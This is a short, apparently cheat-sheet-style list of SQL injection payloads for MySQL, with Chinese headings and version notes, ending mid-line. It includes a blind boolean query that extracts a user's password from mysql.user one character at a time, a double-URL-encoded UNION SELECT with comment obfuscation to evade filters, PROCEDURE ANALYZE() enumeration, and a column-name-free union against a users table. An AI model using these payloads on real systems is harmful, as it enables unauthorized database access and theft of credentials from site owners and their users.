par=(1)and(lower(substring((select(pass)from(mysql.user)where(user="user")),1,1))='b')
script.php?...0mysql.user/*-&sendbutton1=Get+Statement
#
news.php?...id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
数据库名字中的连字符...par = 1 limit 0,1 PROCEDURE ANALYZE()
没有列名的数据查询
MySql => 4.1.х
script.php?...par=-1 union select * from (select 1)b,users,(select 1,2,3,4,5,6,7,8)a
MySql =>4.0
script.php?